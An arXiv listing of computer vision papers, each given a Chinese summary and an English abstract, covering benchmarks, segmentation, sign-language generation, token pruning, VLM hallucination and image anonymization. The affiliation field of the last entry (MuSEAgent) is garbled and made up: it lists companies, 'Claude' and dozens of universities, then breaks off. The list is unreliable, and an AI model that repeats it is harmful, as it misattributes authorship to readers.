【速读】:该论文旨在解决现有多语言视觉-语言模型(Vision-Language Models, VLMs)评估基准在处理日语场景文本(scene text)时存在的不足,特别是未能充分涵盖日语特有的复杂性,如混合书写系统(mixed scripts)、频繁的垂直书写(vertical writing)以及远超拉丁字母的字符集规模。当前数据集主要聚焦于扫描文档,缺乏对真实世界场景文本(in-the-wild scene text)的覆盖。为此,作者提出 JaWildText——一个针对日语场景文本理解的诊断性基准,其关键在于构建了一个包含3,241个实例、112万标注字符、覆盖3,643种独特字符类型的高质量数据集,并设计了三个互补任务:密集场景文本视觉问答(Dense Scene Text Visual Question Answering, STVQA)、收据关键信息提取(Receipt Key Information Extraction, KIE)和手写体OCR(Handwriting OCR),分别考察模型在多文本证据推理、布局感知结构化提取及跨媒体与书写方向的页面级转录能力。该方案实现了对日语场景文本理解能力的细粒度、分层诊断,填补了领域空白。
链接: https://arxiv.org/abs/2603.27942
作者: Koki Maeda(1 and 2),Naoaki Okazaki(1 and 2) ((1) Institute of Science Tokyo, Tokyo, Japan, (2) Research and Development Center for Large Language Models, National Institute of Informatics, Tokyo, Japan)
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: 18 pages
Abstract:Japanese scene text poses challenges that multilingual benchmarks often fail to capture, including mixed scripts, frequent vertical writing, and a character inventory far larger than the Latin alphabet. Although Japanese is included in several multilingual benchmarks, these resources do not adequately capture the language-specific complexities. Meanwhile, existing Japanese visual text datasets have primarily focused on scanned documents, leaving in-the-wild scene text underexplored. To fill this gap, we introduce JaWildText, a diagnostic benchmark for evaluating vision-language models (VLMs) on Japanese scene text understanding. JaWildText contains 3,241 instances from 2,961 images newly captured in Japan, with 1.12 million annotated characters spanning 3,643 unique character types. It comprises three complementary tasks that vary in visual organization, output format, and writing style: (i) Dense Scene Text Visual Question Answering (STVQA), which requires reasoning over multiple pieces of visual text evidence; (ii) Receipt Key Information Extraction (KIE), which tests layout-aware structured extraction from mobile-captured receipts; and (iii) Handwriting OCR, which evaluates page-level transcription across various media and writing directions. We evaluate 14 open-weight VLMs and find that the best model achieves an average score of 0.64 across the three tasks. Error analyses show recognition remains the dominant bottleneck, especially for kanji. JaWildText enables fine-grained, script-aware diagnosis of Japanese scene text capabilities, and will be released with evaluation code.
[CV-106] A Cross-Scale Decoder with Token Refinement for Off-Road Semantic Segmentation
【速读】:该论文旨在解决非公路场景(off-road environments)中语义分割面临的三大核心挑战:地形类别间类级相似性导致边界模糊、稀疏或细小结构(如狭窄通行缝隙)因监督信号不足而难以建模,以及现有解码器设计在细节保留与噪声抑制之间的权衡困境。解决方案的关键在于提出一种跨尺度解码器(cross-scale decoder),通过三个互补机制实现:1)全局-局部令牌精修模块,在紧凑瓶颈网格上整合语义上下文并借助边界感知正则化增强对模糊标注的鲁棒性;2)门控细节桥接机制,利用跨尺度注意力仅一次性注入细粒度结构线索,避免噪声累积同时保留边界与纹理信息;3)不确定性引导的类别感知点精修机制,选择性更新最不可靠像素,以最小计算开销提升罕见和模糊结构的分割精度。该框架实现了噪声鲁棒性与边界保持的平衡,显著优于现有方法且无需密集特征融合。
链接: https://arxiv.org/abs/2603.27931
作者: Seongkyu Choi Jhonghyun An
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Off-road semantic segmentation is fundamentally challenged by irregular terrain, vegetation clutter, and inherent annotation ambiguity. Unlike urban scenes with crisp object boundaries, off-road environments exhibit strong class-level similarity among terrain categories, resulting in thick and uncertain transition regions that degrade boundary coherence and destabilize training. Rare or thin structures, such as narrow traversable gaps or isolated obstacles, further receive sparse and unreliable supervision and are easily overwhelmed by dominant background textures. Existing decoder designs either rely on low-scale bottlenecks that oversmooth fine structural details, or repeatedly fuse high-detail features, which tends to amplify annotation noise and incur substantial computational cost. We present a cross-scale decoder that explicitly addresses these challenges through three complementary mechanisms. First, a global–local token refinement module consolidates semantic context on a compact bottleneck lattice, guided by boundary-aware regularization to remain robust under ambiguous supervision. Second, a gated detail bridge selectively injects fine-scale structural cues only once through cross-scale attention, preserving boundary and texture information while avoiding noise accumulation. Third, an uncertainty-guided class-aware point refinement selectively updates the least reliable pixels, improving rare and ambiguous structures with minimal computational overhead. The resulting framework achieves noise-robust and boundary-preserving segmentation tailored to off-road environments, recovering fine structural details while maintaining deployment-friendly efficiency. Experimental results on standard off-road benchmarks demonstrate consistent improvements over prior approaches without resorting to heavy dense feature fusion.
[CV-107] ForestSim: A Synthetic Benchmark for Intelligent Vehicle Perception in Unstructured Forest Environments
【速读】:该论文旨在解决智能车辆在非结构化野外环境中进行鲁棒场景理解的难题,尤其是由于缺乏高质量、像素级标注的数据集,导致感知系统在森林等复杂地形中难以有效训练与评估。其解决方案的关键在于构建了一个高保真度的合成数据集 ForestSim,利用 Unreal Engine 与 Microsoft AirSim 结合生成了包含 2094 张逼真图像的多场景数据,覆盖 25 种不同环境、多个季节和植被密度,并提供 20 类与自主导航相关的像素级语义标签,从而为无道路环境下的语义分割模型提供了可扩展且可访问的训练与评测基础。
链接: https://arxiv.org/abs/2603.27923
作者: Pragat Wagle,Zheng Chen,Lantao Liu
机构: Indiana University(印第安纳大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Robust scene understanding is essential for intelligent vehicles operating in natural, unstructured environments. While semantic segmentation datasets for structured urban driving are abundant, the datasets for extremely unstructured wild environments remain scarce due to the difficulty and cost of generating pixel-accurate annotations. These limitations hinder the development of perception systems needed for intelligent ground vehicles tasked with forestry automation, agricultural robotics, disaster response, and all-terrain mobility. To address this gap, we present ForestSim, a high-fidelity synthetic dataset designed for training and evaluating semantic segmentation models for intelligent vehicles in forested off-road and no-road environments. ForestSim contains 2094 photorealistic images across 25 diverse environments, covering multiple seasons, terrain types, and foliage densities. Using Unreal Engine environments integrated with Microsoft AirSim, we generate consistent, pixel-accurate labels across 20 classes relevant to autonomous navigation. We benchmark ForestSim using state-of-the-art architectures and report strong performance despite the inherent challenges of unstructured scenes. ForestSim provides a scalable and accessible foundation for perception research supporting the next generation of intelligent off-road vehicles. The dataset and code are publicly available: Dataset: this https URL Code: this https URL
[CV-108] FlashSign: Pose-Free Guidance for Efficient Sign Language Video Generation
【速读】:该论文旨在解决现有手语视频生成模型依赖复杂中间姿态表示而导致灵活性与效率受限的问题。其核心解决方案在于提出一种无姿态(pose-free)的实时手语视频生成框架,通过基于扩散模型(diffusion-based approach)的端到端映射机制,直接将自然语言文本转化为手语视频,无需显式估计人体姿态;同时引入可训练滑动块注意力机制(Trainable Sliding Tile Attention, T-STA),在训练和推理阶段均集成可学习稀疏性,从而利用时空局部性模式加速推理过程,显著降低计算开销并保持高质量输出,使实时部署成为可能。
链接: https://arxiv.org/abs/2603.27915
作者: Liuzhou Zhang,Zeyu Zhang,Biao Wu,Luyao Tang,Zirui Song,Hongyang He,Renda Han,Guangzhen Yao,Huacan Wang,Ronghao Chen,Xiuying Chen,Guan Huang,Zheng Zhu
机构: HUST; GigaAI; UTS; HKU; MBZUAI; Warwick; TJU; NNU; UCAS; UTHealth Houston
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Sign language plays a crucial role in bridging communication gaps between the deaf and hard-of-hearing communities. However, existing sign language video generation models often rely on complex intermediate representations, which limits their flexibility and efficiency. In this work, we propose a novel pose-free framework for real-time sign language video generation. Our method eliminates the need for intermediate pose representations by directly mapping natural language text to sign language videos using a diffusion-based approach. We introduce two key innovations: (1) a pose-free generative model based on the a state-of-the-art diffusion backbone, which learns implicit text-to-gesture alignments without pose estimation, and (2) a Trainable Sliding Tile Attention (T-STA) mechanism that accelerates inference by exploiting spatio-temporal locality patterns. Unlike previous training-free sparsity approaches, T-STA integrates trainable sparsity into both training and inference, ensuring consistency and eliminating the train-test gap. This approach significantly reduces computational overhead while maintaining high generation quality, making real-time deployment feasible. Our method increases video generation speed by 3.07x without compromising video quality. Our contributions open new avenues for real-time, high-quality, pose-free sign language synthesis, with potential applications in inclusive communication tools for diverse communities. Code: this https URL.
[CV-109] Spatial Orthogonal Refinement for Robust RGB-Event Visual Object Tracking
【速读】:该论文旨在解决高动态运动场景下传统RGB传感器因运动模糊导致目标跟踪性能显著下降的问题。现有RGB-Event融合方法通常将事件数据视为密集强度表示,并采用黑箱式融合策略,未能显式利用事件流中蕴含的定向几何先验来校正退化的RGB特征。其解决方案的关键在于提出SOR-Track框架,核心是Spatial Orthogonal Refinement(SOR)模块:该模块通过一组由局部运动方向动态引导的正交方向滤波器,从事件流中提取锐利且与运动一致的结构响应,作为几何锚点,通过非对称结构调制机制调节并优化RGB纹理,从而显式弥合多模态间的结构差异。
链接: https://arxiv.org/abs/2603.27913
作者: Dexing Huang,Shiao Wang,Fan Zhang,Xiao Wang
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Joint International Conference on Automation-Intelligence-Safety and International Symposium on Autonomous Systems 2026 (ICAIS and ISAS 2026)
Abstract:Robust visual object tracking (VOT) remains challenging in high-speed motion scenarios, where conventional RGB sensors suffer from severe motion blur and performance degradation. Event cameras, with microsecond temporal resolution and high dynamic range, provide complementary structural cues that can potentially compensate for these limitations. However, existing RGB-Event fusion methods typically treat event data as dense intensity representations and adopt black-box fusion strategies, failing to explicitly leverage the directional geometric priors inherently encoded in event streams to rectify degraded RGB features. To address this limitation, we propose SOR-Track, a streamlined framework for robust RGB-Event tracking based on Spatial Orthogonal Refinement (SOR). The core SOR module employs a set of orthogonal directional filters that are dynamically guided by local motion orientations to extract sharp and motion-consistent structural responses from event streams. These responses serve as geometric anchors to modulate and refine aliased RGB textures through an asymmetric structural modulation mechanism, thereby explicitly bridging structural discrepancies between two modalities. Extensive experiments on the large-scale FE108 benchmark demonstrate that SOR-Track consistently outperforms existing fusion-based trackers, particularly under motion blur and low-light conditions. Despite its simplicity, the proposed method offers a principled and physics-grounded approach to multi-modal feature alignment and texture rectification. The source code of this paper will be released on this https URL
[CV-110] BINO: Encoder Centric Self Supervised Stereo With Native Pair Input
【速读】:该论文旨在解决立体视觉(stereo vision)中特征表示难以保持跨视角细粒度对应关系的问题,传统自监督视觉模型虽能良好迁移,但并非为此目标设计,而几何导向的方法通常依赖双目解码器或预训练阶段的显式链接模块(explicit linkage module)。其解决方案的关键在于提出BINO架构,通过在输入阶段融合校正后的图像对形成“立体微单元标记”(stereo micro cell tokens),并引入行感知的补丁相位位置编码(row aware patch phase positional encoding),使强双目结构得以在紧凑的编码器内部学习。此外,采用单视图掩码标记仅蒸馏(masked token only distillation)策略,结合遮挡与视图特定外观不匹配损失进行训练,在无需额外链接模块的情况下实现了优于现有基线的冻结描述符性能,表明跨视角推理能力可被整合进轻量级且可复用的编码器中。
链接: https://arxiv.org/abs/2603.27904
作者: Haokun Zhou
机构: Imperial College London (帝国理工学院)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Stereo needs features that preserve fine cross view correspondence rather than only semantic similarity. Recent self supervised vision models transfer well, but they are not built for this goal, and geometry focused methods often rely on a binocular decoder or another explicit linkage module during pretraining. BINO asks whether strong binocular structure can instead be learned inside a compact encoder. It does this by fusing the rectified pair at the input stage, forming stereo micro cell tokens, and using a row aware patch phase positional encoding. Training uses one view masked token only distillation together with occlusion and view specific appearance mismatch. In a strict low resource setting with pretraining only on KITTI object, BINO gives the best frozen descriptor results under a no linkage probe among all compared baselines on proxy dense stereo, hard negative retrieval, and KITTI Stereo~2012 disparity. With the same lightweight stereo head for every encoder, it stays near CroCo~v2 while using a much smaller encoder. Supplementary transfer experiments on KITTI Stereo~2015 show the same qualitative trend. These results suggest that much of the cross view reasoning often assigned to a separate linkage module can be learned inside a compact and reusable encoder.
[CV-111] Rényi Entropy: A New Token Pruning Metric for Vision Transformers
【速读】:该论文旨在解决视觉 Transformer (Vision Transformer, ViT) 在高分辨率输入下因自注意力机制具有 O(N2) 时间复杂度而导致推理成本高昂的问题。现有基于 [CLS] 标记的重要性评估方法在早期网络层中可靠性不足,因其语义表示尚未成熟,易导致误判和信息丢失。为此,作者提出一种无需训练的 token 重要性度量方法——Col-Ln,其基于 Rényi 熵构建,能够在网络第一层即识别出有信息量的 token,从而实现更可靠的早期层剪枝,显著提升模型推理效率。实验表明,该方法在 ViT 和大型视觉语言模型(Large Vision-Language Models, LVLMs)上均优于当前最优剪枝方法。
链接: https://arxiv.org/abs/2603.27900
作者: Wei-Yuan Su,Ruijie Zhang,Zheng Zhang
机构: University of California, Santa Barbara (加州大学圣塔芭芭拉分校)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Vision Transformers (ViTs) achieve state-of-the-art performance but suffer from the O(N^2) complexity of self-attention, making inference costly for high-resolution inputs. To address this bottleneck, token pruning has emerged as a critical technique to accelerate inference. Most existing methods rely on the [CLS] token to estimate patch importance. However, we argue that the [CLS] token can be unreliable in early layers where semantic representations are still immature. As a result, pruning in the early layer often leads to inaccurate importance estimation and unnecessary information loss. In this work, we propose a training-free token importance metric, namely Col-Ln, which is derived from Rényi entropy that enables the identification of informative tokens from the first layer of the network, thereby enabling more reliable pruning in token reduction. Extensive experiments on ViTs and Large Vision-Language Models (LVLMs) demonstrate that our approach consistently outperforms state-of-the-art pruning methods across diverse benchmarks.
[CV-112] SAGE: Sink-Aware Grounded Decoding for Multimodal Hallucination Mitigation
【速读】:该论文旨在解决大规模视觉语言模型(Vision-Language Models, VLMs)在生成过程中常见的幻觉问题,即模型输出内容与输入图像不一致的现象。现有方法多依赖后处理过滤、额外训练目标或外部验证,但未能在解码阶段实时干预以抑制幻觉。其解决方案的关键在于提出SAGE(Sink-Aware Grounded Decoding)框架,通过动态调节自注意力机制来增强生成过程的视觉一致性:识别出易引发幻觉的“注意力sink tokens”(如标点符号等语义信息稀疏的token),将其作为锚点实时监测生成内容的视觉接地可靠性;基于这些token提取语义概念,并结合自注意力图与梯度归因法评估其空间一致性,进而自适应地调整注意力分布——强化可靠区域或抑制不可靠区域,从而在不改变模型结构或重新训练的前提下显著降低幻觉率,同时保持描述完整性。
链接: https://arxiv.org/abs/2603.27898
作者: Tripti Shukla,Zsolt Kira
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 25 pages, 6 figures, 7 tables
Abstract:Large vision-language models (VLMs) frequently suffer from hallucinations, generating content that is inconsistent with visual inputs. Existing methods typically address this problem through post-hoc filtering, additional training objectives, or external verification, but they do not intervene during the decoding process when hallucinations arise. In this work, we introduce SAGE, a Sink-Aware Grounded Decoding framework that mitigates hallucinations by dynamically modulating self-attention during generation. Hallucinations are strongly correlated with attention sink tokens - punctuation or function tokens that accumulate disproportionate attention despite carrying limited semantic content. SAGE leverages these tokens as anchors to monitor grounding reliability in real time. At each sink trigger, the method extracts semantic concepts from the generated sequence, estimates their visual grounding using both self-attention maps and gradient-based attribution, and measures their spatial agreement. Based on this signal, self-attention distributions are adaptively sharpened or broadened to reinforce grounded regions or suppress unreliable ones. Extensive experiments across diverse hallucination benchmarks demonstrate that SAGE consistently outperforms existing decoding strategies, achieving substantial reductions in hallucination while preserving descriptive coverage, without requiring model retraining or architectural modifications. Our method achieves an average relative improvement of 10.65% on MSCOCO and 7.19% on AMBER across diverse VLM architectures, demonstrating consistent gains in hallucination mitigation.
[CV-113] Poppy: Polarization-based Plug-and-Play Guidance for Enhancing Monocular Normal Estimation
【速读】:该论文旨在解决单目RGB图像表面法向估计器在反射、无纹理和暗表面等边缘场景下性能下降的问题。现有方法依赖多视角采集或特定训练数据,限制了泛化能力。其解决方案的关键在于提出一种无需训练的框架Poppy,通过单次偏振测量在测试时优化输入RGB图像与输出法向之间的像素级偏移,并结合学习到的反射率分解,利用可微渲染层将修正后的法向转换为偏振预测,从而最小化与观测信号的差异,实现对挑战性表面法向的有效修正。
链接: https://arxiv.org/abs/2603.27891
作者: Irene Kim,Sai Tanmay Reddy Chakkera,Alexandros Graikos,Dimitris Samaras,Akshat Dave
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: project page: this https URL
Abstract:Monocular surface normal estimators trained on large-scale RGB-normal data often perform poorly in the edge cases of reflective, textureless, and dark surfaces. Polarization encodes surface orientation independently of texture and albedo, offering a physics-based complement for these cases. Existing polarization methods, however, require multi-view capture or specialized training data, limiting generalization. We introduce Poppy, a training-free framework that refines normals from any frozen RGB backbone using single-shot polarization measurements at test time. Keeping backbone weights frozen, Poppy optimizes per-pixel offsets to the input RGB and output normal along with a learned reflectance decomposition. A differentiable rendering layer converts the refined normals into polarization predictions and penalizes mismatches with the observed signal. Across seven benchmarks and three backbone architectures (diffusion, flow, and feed-forward), Poppy reduces mean angular error by 23-26% on synthetic data and 6-16% on real data. These results show that guiding learned RGB-based normal estimators with polarization cues at test time refines normals on challenging surfaces without retraining.
[CV-114] Wan-R1: Verifiable-Reinforcement Learning for Video Reasoning
【速读】:该论文旨在解决视频生成模型在空间推理和多步规划任务中表现不佳的问题,尤其是强化学习(Reinforcement Learning, RL)在提升视频推理能力时因奖励设计不当而导致的泛化性能受限问题。其解决方案的关键在于设计可验证的奖励函数(verifiable reward functions),而非依赖于多模态奖励模型。作者通过在流形基础视频模型上应用组相对策略优化(Group Relative Policy Optimization, GRPO),并分别针对结构化游戏环境引入多组件轨迹奖励、针对机器人导航任务提出嵌入层级别的可验证奖励,实验证明此类奖励机制能显著提升模型在复杂3D迷宫和陷阱规避任务中的准确率(分别提升29.1%和51.4%),同时避免了多模态奖励模型导致的退化解问题,从而确立了可验证奖励设计作为实现鲁棒视频推理的核心要素。
链接: https://arxiv.org/abs/2603.27866
作者: Ming Liu,Yunbei Zhang,Shilong Liu,Liwen Wang,Wensheng Zhang
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Video generation models produce visually coherent content but struggle with tasks requiring spatial reasoning and multi-step planning. Reinforcement learning (RL) offers a path to improve generalization, but its effectiveness in video reasoning hinges on reward design – a challenge that has received little systematic study. We investigate this problem by adapting Group Relative Policy Optimization (GRPO) to flow-based video models and training them on maze-solving and robotic navigation tasks. We first show that multimodal reward models fail catastrophically in this setting. To address this, we design verifiable reward functions grounded in objective task metrics. For structured game environments, we introduce a multi-component trajectory reward. For robotic navigation, we propose an embedding-level verifiable reward. Our experiments show that RL fine-tuning with verifiable rewards improves generalization. For example, on complex 3D mazes, our model improves exact match accuracy by 29.1% over the SFT baseline, and on trap-avoidance tasks by 51.4%. Our systematic reward analysis reveals that verifiable rewards are critical for stable training, while multimodal reward models could lead to degenerate solutions. These findings establish verifiable reward design as a key enabler for robust video reasoning. Code will be publicly available.
[CV-115] ImagenWorld: Stress-Testing Image Generation Models with Explainable Human Evaluation on Open-ended Real-World Tasks ICLR2026
【速读】:该论文旨在解决当前图像生成模型评估基准存在的局限性问题,如任务覆盖不全、领域单一、缺乏可解释性评分等,导致对模型性能的判断不够全面和深入。其解决方案的关键在于提出一个名为ImagenWorld的新基准,包含3.6K条件集(涵盖六类核心任务与六类主题领域),并配套20K细粒度人工标注与可解释的评估框架,能够识别局部对象级和区域级错误,从而实现对生成质量的精细化诊断。这一设计不仅提升了评估的严谨性,也为模型优化提供了明确的方向指引。
链接: https://arxiv.org/abs/2603.27862
作者: Samin Mahdizadeh Sani,Max Ku,Nima Jamali,Matina Mahdizadeh Sani,Paria Khoshtab,Wei-Chieh Sun,Parnian Fazel,Zhi Rui Tam,Thomas Chong,Edisy Kin Wai Chan,Donald Wai Tong Tsang,Chiao-Wei Hsu,Ting Wai Lam,Ho Yin Sam Ng,Chiafeng Chu,Chak-Wing Mak,Keming Wu,Hiu Tung Wong,Yik Chun Ho,Chi Ruan,Zhuofeng Li,I-Sheng Fang,Shih-Ying Yeh,Ho Kei Cheng,Ping Nie,Wenhu Chen
机构: University of Waterloo (滑铁卢大学); G-G-G; Comfy Org; University of Illinois Urbana-Champaign (伊利诺伊大学厄巴纳-香槟分校); Independent
类目: Graphics (cs.GR); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: Published in ICLR 2026
Abstract:Advances in diffusion, autoregressive, and hybrid models have enabled high-quality image synthesis for tasks such as text-to-image, editing, and reference-guided composition. Yet, existing benchmarks remain limited, either focus on isolated tasks, cover only narrow domains, or provide opaque scores without explaining failure modes. We introduce \textbfImagenWorld, a benchmark of 3.6K condition sets spanning six core tasks (generation and editing, with single or multiple references) and six topical domains (artworks, photorealistic images, information graphics, textual graphics, computer graphics, and screenshots). The benchmark is supported by 20K fine-grained human annotations and an explainable evaluation schema that tags localized object-level and segment-level errors, complementing automated VLM-based metrics. Our large-scale evaluation of 14 models yields several insights: (1) models typically struggle more in editing tasks than in generation tasks, especially in local edits. (2) models excel in artistic and photorealistic settings but struggle with symbolic and text-heavy domains such as screenshots and information graphics. (3) closed-source systems lead overall, while targeted data curation (e.g., Qwen-Image) narrows the gap in text-heavy cases. (4) modern VLM-based metrics achieve Kendall accuracies up to 0.79, approximating human ranking, but fall short of fine-grained, explainable error attribution. ImagenWorld provides both a rigorous benchmark and a diagnostic tool to advance robust image generation.
[CV-116] 3-D Representations for Hyperspectral Flame Tomography
【速读】:该论文旨在解决火焰三维热化学重构中传统体素网格(voxel-grid)表示与连续神经表示在重建精度和计算效率方面的定量比较问题。其关键解决方案是构建两种统一的建模框架:一种基于不同正则化策略的体素网格表示,另一种基于神经网络的连续表示,二者均输出温度和组分的空间分布函数,并通过射线追踪求解辐射传输方程以模拟高光谱红外相机接收到的光谱强度,最终对比两者在合成池火场景下的重建准确性、内存占用和运行时间表现。结果表明,采用总变差(total variation)正则化的体素网格方法在保持较低内存消耗和运行时间的同时实现了最高精度的重建效果。
链接: https://arxiv.org/abs/2603.27832
作者: Nicolas Tricard,Zituo Chen,Sili Deng
机构: Massachusetts Institute of Technology (麻省理工学院)
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: 7 pages, 2 figures, 1 table
Abstract:Flame tomography is a compelling approach for extracting large amounts of data from experiments via 3-D thermochemical reconstruction. Recent efforts employing neural-network flame representations have suggested improved reconstruction quality compared with classical tomography approaches, but a rigorous quantitative comparison with the same algorithm using a voxel-grid representation has not been conducted. Here, we compare a classical voxel-grid representation with varying regularizers to a continuous neural representation for tomographic reconstruction of a simulated pool fire. The representations are constructed to give temperature and composition as a function of location, and a subsequent ray-tracing step is used to solve the radiative transfer equation to determine the spectral intensity incident on hyperspectral infrared cameras, which is then convolved with an instrument lineshape function. We demonstrate that the voxel-grid approach with a total-variation regularizer reproduces the ground-truth synthetic flame with the highest accuracy for reduced memory intensity and runtime. Future work will explore more representations and under experimental configurations.
[CV-117] Benchmarking Multi-View BEV Object Detection with Mixed Pinhole and Fisheye Cameras ICRA
【速读】:该论文旨在解决当前鸟瞰图(Bird’s-Eye View, BEV)3D目标检测模型在混合相机配置(包括针孔相机与鱼眼相机)下性能下降的问题,尤其是在使用鱼眼相机时因径向畸变导致的检测精度降低。其核心解决方案在于构建首个基于真实数据的BEV 3D检测基准——将KITTI-360数据集转换为nuScenes格式,并系统性地提出三种适应策略:1)通过图像矫正实现零样本评估和微调;2)基于MEI相机模型设计畸变感知的视图变换模块(View Transformation Module, VTM);3)采用极坐标表示以更好地匹配鱼眼相机的径向畸变特性。研究表明,无需投影的架构(如PETR)对鱼眼畸变具有更强的鲁棒性,优于依赖传统投影的VTM方法,从而为设计高效、低成本且鲁棒的3D感知系统提供了实践指导。
链接: https://arxiv.org/abs/2603.27818
作者: Xiangzhong Liu,Hao Shen
机构: fortiss GmbH(德国弗劳恩霍夫信息安全与通信技术研究所)
类目: Computer Vision and Pattern Recognition (cs.CV); Robotics (cs.RO)
备注: 8 pages,5 figures, IEEE International Conference on Robotics and Automation (ICRA),Vienna, Austria, 1-5 June 2026
Abstract:Modern autonomous driving systems increasingly rely on mixed camera configurations with pinhole and fisheye cameras for full view perception. However, Bird’s-Eye View (BEV) 3D object detection models are predominantly designed for pinhole cameras, leading to performance degradation under fisheye distortion. To bridge this gap, we introduce a multi-view BEV detection benchmark with mixed cameras by converting KITTI-360 into nuScenes format. Our study encompasses three adaptations: rectification for zero-shot evaluation and fine-tuning of nuScenes-trained models, distortion-aware view transformation modules (VTMs) via the MEI camera model, and polar coordinate representations to better align with radial distortion. We systematically evaluate three representative BEV architectures, BEVFormer, BEVDet and PETR, across these strategies. We demonstrate that projection-free architectures are inherently more robust and effective against fisheye distortion than other VTMs. This work establishes the first real-data 3D detection benchmark with fisheye and pinhole images and provides systematic adaptation and practical guidelines for designing robust and cost-effective 3D perception systems. The code is available at this https URL.
[CV-118] owards Context-Aware Image Anonymization with Multi-Agent Reasoning CVPR2026
【速读】:该论文旨在解决街景图像中个人身份信息(PII)的隐私保护问题,尤其是现有匿名化方法在处理上下文依赖性标识符时存在过度处理或遗漏细微标识的问题,以及基于API的解决方案对数据主权的潜在威胁。其核心解决方案是提出一个基于多智能体推理的上下文感知图像匿名化框架CAIAMAR,关键在于通过三个专业化智能体在Plan-Do-Check-Act(PDCA)循环中协作,结合空间滤波的粗到精检测策略与扩散模型引导的去关联化处理,实现对直接和间接PII的精准识别与匿名化,同时保持图像语义完整性并满足GDPR透明性要求。
链接: https://arxiv.org/abs/2603.27817
作者: Robert Aufschläger,Jakob Folz,Gautam Savaliya,Manjitha D Vidanalage,Michael Heigl,Martin Schramm
机构: Deggendorf Institute of Technology (德根多夫技术学院)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Cryptography and Security (cs.CR)
备注: Accepted to IEEE CVPR 2026 GRAIL-V Workshop
Abstract:Street-level imagery contains personally identifiable information (PII), some of which is context-dependent. Existing anonymization methods either over-process images or miss subtle identifiers, while API-based solutions compromise data sovereignty. We present an agentic framework CAIAMAR (\underlineContext-\underlineAware \underlineImage \underlineAnonymization with \underlineMulti-\underlineAgent \underlineReasoning) for context-aware PII segmentation with diffusion-based anonymization, combining pre-defined processing for high-confidence cases with multi-agent reasoning for indirect identifiers. Three specialized agents coordinate via round-robin speaker selection in a Plan-Do-Check-Act (PDCA) cycle, enabling large vision-language models to classify PII based on spatial context (private vs. public property) rather than rigid category rules. The agents implement spatially-filtered coarse-to-fine detection where a scout-and-zoom strategy identifies candidates, open-vocabulary segmentation processes localized crops, and IoU -based deduplication ( 30% threshold) prevents redundant processing. Modal-specific diffusion guidance with appearance decorrelation substantially reduces re-identification (Re-ID) risks. On CUHK03-NP, our method reduces person Re-ID risk by 73% ( R1 : 16.9% vs. 62.4% baseline). For image quality preservation on CityScapes, we achieve KID: 0.001 , and FID: 9.1 , significantly outperforming existing anonymization. The agentic workflow detects non-direct PII instances across object categories, and downstream semantic segmentation is preserved. Operating entirely on-premise with open-source models, the framework generates human-interpretable audit trails supporting EU’s GDPR transparency requirements while flagging failed cases for human review.
[CV-119] MuSEAgent : A Multimodal Reasoning Agent with Stateful Experiences
【速读】:该论文旨在解决现有研究代理(Research Agent)在处理多模态信息时,因缺乏对交互过程中状态依赖性经验的建模而导致决策能力受限的问题。传统方法通常依赖轨迹级(trajectory-level)的经验检索,难以捕捉细粒度的决策逻辑与跨任务的可迁移知识。其解决方案的关键在于提出一种状态感知的经验学习范式(stateful experience learning paradigm),通过事后推理(hindsight reasoning)将交互数据抽象为原子化的决策经验,并构建质量过滤后的经验库(experience bank),支持策略驱动的推理阶段经验检索。该机制使MuSEAgent能够结合广度搜索与深度搜索策略,动态获取跨模态、多语义视角的指导信息,从而显著提升复杂多模态推理任务中的表现。
链接: https://arxiv.org/abs/2603.27813
作者: Shijian Wang,Jiarui Jin,Runhao Fu,Zexuan Yan,Xingjian Wang,Mengkang Hu,Eric Wang,Xiaoxi Li,Kangning Zhang,Li Yao,Wenxiang Jiao,Xuelian Cheng,Yuan Lu,Zongyuan Ge
机构: Qwen Team (Qwen团队); OpenAI; Meta; Stability.AI; Anthropic; Character.ai; Claude; Google(谷歌); Stanford University (斯坦福大学); MIT (麻省理工学院); Harvard University (哈佛大学); University of California, Berkeley (加州大学伯克利分校); University of Oxford (牛津大学); University of Cambridge (剑桥大学); ETH Zurich (苏黎世联邦理工学院); Tsinghua University (清华大学); Peking University (北京大学); Fudan University (复旦大学); Shanghai Jiao Tong University (上海交通大学); National University of Singapore (新加坡国立大学); University of Tokyo (东京大学); Seoul National University (首尔国立大学); University of Toronto (多伦多大学); University of Montreal (蒙特利尔大学); University of Washington (华盛顿大学); University of Illinois Urbana-Champaign (伊利诺伊大学厄巴纳-香槟分校); University of Pennsylvania (宾夕法尼亚大学); Cornell University (康奈尔大学); UC San Diego (加州大学圣地亚哥分校); University of Michigan (密歇根大学); University of Texas at Austin (德克萨斯大学奥斯汀分校); University of Chicago (芝加哥大学); University of Southern California (南加州大学); University of Wisconsin-Madison (威斯康星大学麦迪逊分校); University of Maryland (马里兰大学); University of Colorado Boulder (科罗拉多大学博尔德分校); University of Utah (犹他大学); University of Iowa (爱荷华大学); University of Minnesota (明尼苏达大学); University of North Carolina at Chapel Hill (北卡罗来纳大学教堂山分校); University of Florida (佛罗里达大学); University of Georgia (佐治亚大学); University of Virginia (弗吉尼亚大学); University of Pittsburgh (匹兹堡大学); University of Rochester (罗切斯特大学); University of Indiana Bloomington (印第安纳大学布卢明顿分校); University of Oregon (俄勒冈大学); University of Arizona (亚利桑那大学); University of Nevada Las Vegas (内华达大学拉斯维加斯分校); University of Hawaii (夏威夷大学); University of Alaska Fairbanks (阿拉斯加大学费尔班克斯分校); University of Montana (蒙大拿大学); University of Idaho (爱达荷大学); University of Wyoming (怀俄明大学); University of New Mexico (新墨西哥大学); University of Colorado Denver (科罗拉多大学丹佛分校); University of Utah (犹他大学); University of Nebraska (内布拉斯加大学); University of Kansas (堪萨斯大学); University of Missouri (密苏里大学); University of Tennessee 